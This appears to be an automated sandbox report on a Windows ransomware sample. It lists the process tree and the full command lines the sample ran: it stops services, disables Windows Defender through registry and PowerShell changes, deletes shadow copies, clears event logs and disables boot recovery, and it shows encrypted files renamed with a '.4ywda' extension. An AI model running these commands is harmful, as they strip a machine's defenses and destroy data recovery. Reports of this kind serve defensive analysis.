PID 1792 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1740 wrote to memory of 832 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1740 wrote to memory of 832 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1740 wrote to memory of 832 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1792 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1812 wrote to memory of 360 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1812 wrote to memory of 360 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1812 wrote to memory of 360 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1792 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1788 wrote to memory of 828 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1788 wrote to memory of 828 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1788 wrote to memory of 828 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1792 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1828 wrote to memory of 1112 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1828 wrote to memory of 1112 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1828 wrote to memory of 1112 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1792 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1068 wrote to memory of 1928 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1068 wrote to memory of 1928 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1068 wrote to memory of 1928 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1792 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1804 wrote to memory of 1976 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1804 wrote to memory of 1976 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1804 wrote to memory of 1976 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1792 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\sc.exe
PID 1792 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe

"C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files

memory/520-54-0x0000000000000000-mapping.dmp

memory/540-55-0x0000000000000000-mapping.dmp

memory/760-56-0x0000000000000000-mapping.dmp

memory/1624-57-0x0000000000000000-mapping.dmp

memory/1740-58-0x0000000000000000-mapping.dmp

memory/832-59-0x0000000000000000-mapping.dmp

memory/1812-60-0x0000000000000000-mapping.dmp

memory/360-61-0x0000000000000000-mapping.dmp

memory/1788-62-0x0000000000000000-mapping.dmp

memory/828-63-0x0000000000000000-mapping.dmp

memory/1828-64-0x0000000000000000-mapping.dmp

memory/1112-65-0x0000000000000000-mapping.dmp

memory/1068-66-0x0000000000000000-mapping.dmp

memory/1928-67-0x0000000000000000-mapping.dmp

memory/1804-68-0x0000000000000000-mapping.dmp

memory/1976-69-0x0000000000000000-mapping.dmp

memory/1652-70-0x0000000000000000-mapping.dmp

memory/680-71-0x0000000000000000-mapping.dmp

memory/1312-72-0x0000000000000000-mapping.dmp

memory/1296-73-0x0000000000000000-mapping.dmp

memory/1756-74-0x0000000000000000-mapping.dmp

memory/1440-75-0x0000000000000000-mapping.dmp

memory/1304-76-0x0000000000000000-mapping.dmp

memory/1672-77-0x0000000000000000-mapping.dmp

memory/584-78-0x0000000000000000-mapping.dmp

memory/1528-79-0x0000000000000000-mapping.dmp

memory/1524-80-0x0000000000000000-mapping.dmp

memory/272-81-0x0000000000000000-mapping.dmp

memory/1544-82-0x0000000000000000-mapping.dmp

memory/432-83-0x0000000000000000-mapping.dmp

memory/1112-84-0x0000000000000000-mapping.dmp

memory/1612-85-0x0000000000000000-mapping.dmp

memory/1476-86-0x0000000000000000-mapping.dmp

memory/1360-87-0x0000000000000000-mapping.dmp

memory/1632-88-0x0000000000000000-mapping.dmp

memory/316-89-0x0000000000000000-mapping.dmp

memory/384-90-0x0000000000000000-mapping.dmp

memory/920-91-0x0000000000000000-mapping.dmp

memory/1572-92-0x0000000000000000-mapping.dmp

memory/664-93-0x0000000000000000-mapping.dmp

memory/1416-94-0x0000000000000000-mapping.dmp

memory/1864-95-0x0000000000000000-mapping.dmp

memory/800-96-0x0000000000000000-mapping.dmp

memory/1600-97-0x0000000000000000-mapping.dmp

memory/1588-98-0x0000000000000000-mapping.dmp

memory/560-99-0x0000000000000000-mapping.dmp

memory/632-100-0x0000000000000000-mapping.dmp

memory/804-101-0x0000000000000000-mapping.dmp

memory/1776-102-0x0000000000000000-mapping.dmp

memory/772-103-0x0000000000000000-mapping.dmp

memory/916-104-0x0000000000000000-mapping.dmp

memory/1408-105-0x0000000000000000-mapping.dmp

memory/1548-106-0x0000000000000000-mapping.dmp

memory/1868-107-0x0000000000000000-mapping.dmp

memory/688-108-0x0000000000000000-mapping.dmp

memory/960-109-0x0000000000000000-mapping.dmp

memory/764-110-0x0000000000000000-mapping.dmp

memory/832-111-0x0000000000000000-mapping.dmp

memory/1384-112-0x0000000000000000-mapping.dmp

memory/1384-113-0x000007FEFB571000-0x000007FEFB573000-memory.dmp

memory/1716-114-0x0000000000000000-mapping.dmp

memory/564-116-0x0000000000000000-mapping.dmp

memory/1620-118-0x0000000000000000-mapping.dmp

memory/1400-119-0x0000000000000000-mapping.dmp

memory/2064-120-0x0000000000000000-mapping.dmp

memory/2160-122-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp

memory/2160-123-0x0000000002620000-0x0000000002622000-memory.dmp

memory/2160-124-0x0000000002622000-0x0000000002624000-memory.dmp

memory/2160-125-0x0000000002624000-0x0000000002627000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 5464474b4b4e8ae38c10b2cd2ada30fe
SHA1 1f91b4850c26fdcce42aa16c2f571459772f4329
SHA256 f4a25c2e6153d00d41b9a2db8dcb3c496fa42620638e69c2e40631e40628f4f7
SHA512 f897951fedafe5788af2335f87118d735977e011e93be3ee91cefcbb142d3aa02338e1181b7e723ddf48f4388f61d9297f8cb70a302df6946b400056c401e59d

memory/2244-128-0x000007FEF1DE0000-0x000007FEF293D000-memory.dmp

memory/2160-129-0x000000000262B000-0x000000000264A000-memory.dmp

memory/2244-131-0x0000000002872000-0x0000000002874000-memory.dmp

memory/2244-130-0x0000000002870000-0x0000000002872000-memory.dmp

memory/2244-132-0x0000000002874000-0x0000000002877000-memory.dmp

memory/2244-133-0x000000000287B000-0x000000000289A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-13 10:00

Reported

2022-01-13 10:05

Platform

win10-en-20211208

Max time kernel

106s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\Wide310x150\PaintWideTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Audio\slide_in.wav C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\ui-strings.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_OAAAADgAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTest-pl.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Trial-ppd.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_OgAAADoAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarWideTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-cn\ui-strings.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-30_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailBadge.scale-125.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_selected_18.svg.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_MAAAADAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_DAAAAAwAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsSmallTile.contrast-black_scale-100.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\en-us\oregres.dll.mui.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_NgAAADYAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookMedTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-256.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\profilePic.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\es-es\ui-strings.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_LAAAACwAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\fr-FR\micaut.dll.mui.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_FgAAABYAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-ppd.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_IgAAACIAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\LargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\LargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial1-ppd.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_EAAAABAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
